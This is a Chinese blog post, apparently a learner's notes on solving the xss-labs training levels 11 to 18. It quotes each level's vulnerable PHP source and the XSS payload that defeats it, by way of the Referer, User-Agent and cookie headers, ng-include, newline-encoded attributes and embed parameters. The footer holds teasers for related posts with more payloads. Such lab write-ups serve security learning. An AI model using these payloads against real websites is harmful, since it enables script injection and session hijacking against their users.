XSS学习笔记2

于 2022-02-12 13:20:32 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: 刷题记录 文章标签: xss elementui webview
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/122893962
版权

目录

leval11

leval12

leval13

leval15

leval16

leval17

leval18 

 Level 19,20 等学完 Flash xss回来补充

大佬文章总结XSS绕过

leval11

看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

根据HTTP_REFERER 参数想到了HTTP头,那么我们可以在请求头进行XSS注入,这一关很显然注入点在Referer,那么我们可以使用burpsuite和火狐插件hackbar,在这一关中直接利用burpsuite抓包修改Referer,

 

 "οnclick="alert()" type="text 

 

leval12

看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

这里是user-agent,那就抓包修改 

 

"οnclick="alert(1)" type="text

leval13

看源码

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

跟前面几道题一样,这次是在cookie改 

"οnclick=alert(1) type="text

 

leval15

看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

ng-include有包含文件的意思,也就相当于php里面的include

src地址无法访问

先将其换成国内可以访问的地址:

https://cdn.staticfile.org/angular.js/1.4.6/angular.min.js

既然这里可以包含html文件,那么也就可以包含之前有过xss漏洞的源文件 

?src='level1.php?name=<img src=1 οnerrοr=alert(1)>'

 

 <img>图片url获取失败时通过onerror显示默认图片

特别值得注意的几点如下:

1.ng-include,如果单纯指定地址,必须要加引号

2.ng-include,加载外部html,script标签中的内容不执行

3.ng-include,加载外部html中含有style标签样式可以识别

leval16

看源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>

<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>

script / 大小写都被绕过了,我们可以用%0d,%0a代替 

<img%0Dsrc=1%0Dοnerrοr=alert(1)>

<iframe%0asrc=x%0dοnmοuseοver=alert`1`>

</iframe> <svg%0aοnlοad=alert`1`></svg> 

leval17

看源码

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

 arg01=1&arg02= οnmοuseοver=alert(1)

 

leval18 

看源码

<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>

 和17题一样

 

 Level 19,20 等学完 Flash xss回来补充

大佬文章总结XSS绕过

摘自大佬文章总结xss绕过方法

pipasound
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透测试】跨站脚本攻击(XSS):xss-labs通关简记
weixin_53972936的博客
10-25 1892
XSS又叫CSS(Cross Site Script)跨站脚本攻击,是指恶意攻击者往web页面中插入恶意代码,当用户浏览该网页时,嵌入其中的恶意代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击。 XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,从而达到劫持用户会话的目的。由于HTML代码和客户端JavaScript脚本能在受害者主机上的浏览器任意执行,这样等同于完全控制了Web客户端的逻辑,在这个基础上,黑客或攻击者可以轻易地发动各种各样的攻
xss-labs通关记录
m0_46571665的博客
05-23 457
目录 leve1 level2 level3 level4 level5 level6 level7 level8 level9 level10 level11 level12 level13 level14 level15 level16 level17 level18 level19 level20 leve1 观察界面可以发现,它想服务器提交一个name参数,值为test,并将结果显示在页面上,并且显示了参数值的字符长度。 查看源码 .
Angular Js XSS漏洞
shy的博客
03-17 4003
编写html文档的时候,为了实现代码模块化,增加复杂页面的代码可读性和可维护性,我们常常会想到将代码分散写入不同的HTML文件 angularJS里面的ng-include指令结合ng-controller能够很方便的实现这个目的 ng-include指令用于包含外部的 HTML 文件。 ng-include可以作为一个属性,或者一个元素使用 AngularJS 我可以直接加载html和...
ng-include指令
热门推荐
天马3798
12-15 1万+
一、AngularJS ng-include指令 定义和用法 ng-include 指令用于包含外部的 HTML 文件。 包含的内容将作为指定元素的子节点。 ng-include 属性的值可以是一个表达式,返回一个文件名。 默认情况下,包含的文件需要包含在同一个域名下。 语法 element ng-include="filename" onload="
ng-include用法分析以及多标签页面的简单实现方式
weixin_34220963的博客
03-03 146
2019独角兽企业重金招聘Python工程师标准>>> ...
Webgoat学习笔记.zip
03-12
【WebGoat学习笔记】 WebGoat是一款由OWASP(开放网络应用安全项目)开发的在线教学平台,专门用于教授和实践网络安全中的Web应用程序漏洞。它是一个故意设计有漏洞的Web应用,帮助学习者了解并熟悉各种攻击手段,...
Go Template学习笔记
06-20
2. `{{.FieldName}}`: 访问对象的字段,如 `.UserName` 获取用户的名字。 3. `{{range …}}{{end}}`: 类似于 Go 语言的 `for...range` 循环,用于遍历集合。 4. `{{with …}}{{end}}`: 设置临时上下文,在该块内可以...
webView2学习笔记
最新发布
03-20
在本学习笔记中,我们将深入探讨WebView2的关键特性和应用场景,以及如何有效地在你的应用程序中集成和使用它。 1. **WebView2概述** - WebView2是Microsoft Edge Chromium的嵌入式版本,提供了一种在桌面应用中...
信息安全工程师学习笔记.rar
03-06
《信息安全工程师学习笔记》是针对软考中级信息安全工程师考试的一份详实的学习资料,这份压缩包文件包含了丰富的知识内容,旨在帮助考生系统性地理解和掌握信息安全领域的核心概念、原理和实践技能。以下将对这份...
YII学习笔记
07-30
**YII学习笔记** 在IT领域,Web开发框架是开发者们构建高效、可维护网站的重要工具,而YII就是其中的一员。这半个月的学习笔记详细记录了YII框架的基础知识和核心概念,对于初学者来说是一份宝贵的参考资料。YII,...
7.包含(ng-Include)
weixin_33713350的博客
12-27 119
转自:https://www.cnblogs.com/best/tag/Angular/ 获取、编译并引用一个外部HTML片段(也可以是内部的) 默认情况下,模板URL被强制为使用与应用文档相同的域名和协议。这是通过调用$sce.getTrustedResourceUrl 实现的。为了从其它的域名和协议载入模板,你可以采用 白名单化 或 包裹化 任一手段来作为可信任值。参考 Angular的 强上...
关于XSS的靶场详解
sGanYu
08-11 1万+
xss测试链接 Level1 右击查看页面源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script> window.alert = function() //这里是显示一条指定消息和一个确认按钮的警告框 { confir..
XSS小结
老司机开代码的博客
09-02 371
文章目录前言注入技巧1. 常见注入点2. 常用payload2.1 构造标签2.2 构造事件3. 绕过思路4. 注入思路 前言 最近学习XSS注入。为了避免遗忘,总结一下。 注入技巧 1. 常见注入点 URL 输入框 2. 常用payload 2.1 构造标签 1. <script>alert(1)</script> 2. <a href=javascript:alert(1)> 3. <img src=1 onerror=alert(1)> 4. &
XSS小游戏
a1b2c3是弱口令
07-17 4753
XSS小游戏 level 1 一开始界面上什么都没有,一般是从url上想办法顺便查一下php代码, &amp;amp;amp;amp;amp;lt;script&amp;amp;amp;amp;amp;gt; window.alert = function() { confirm(&amp;amp;amp;amp;quot;完成的不错!&amp;amp;amp;amp;quot;); window.location.href=&amp;amp;amp
angularjs,ng-include引入html代码片段
杨涛峰的博客
03-17 3005
AngularJs,ng-include引入文件 初学者的坑
XSS靶场level15详细通关教程
m0_49434302的博客
07-07 1744
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15关的时候,怎么也无法通关。我这个朋友在15关卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
XSS的攻关练习
黑面狐
08-21 6134
从论坛找到的一个XSS练习源码: 于是开始攻关之路,每攻关一次就更新一下: 第一关: 最简单的直接输入一个标签就直接被执行了,说明完全没有过滤标签。 然后看看源码,看看需要怎样才能通关。 那就是直接调用windows.alert()这个函数就可以通关。 简单明了。 192.168.23.248:93/level1.php?name=window.alert()
XSS刷题之旅
Lethe's Blog
07-30 1576
0x01 一些资源或文章: XSS小结 那些年我们没能bypass的xss filter XSS Filter Evasion Cheat Sheet 中文版 XSS攻击手段&在CTF中的运用 0x02 常用Payload(慢慢积累…) <img src="x" onerror=alert(1)> <img src="1" onerror=eval("alert('xss...
XSS Game挑战笔记:入门到精通
本文档是一份关于XSS Game挑战笔记的详细记录,旨在帮助读者深入理解跨站...这份笔记不仅包含了XSS游戏挑战的实战练习,还涵盖了XSS攻击的原理、编码技巧和防护策略,适合想要提升XSS安全意识和技术能力的读者学习

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值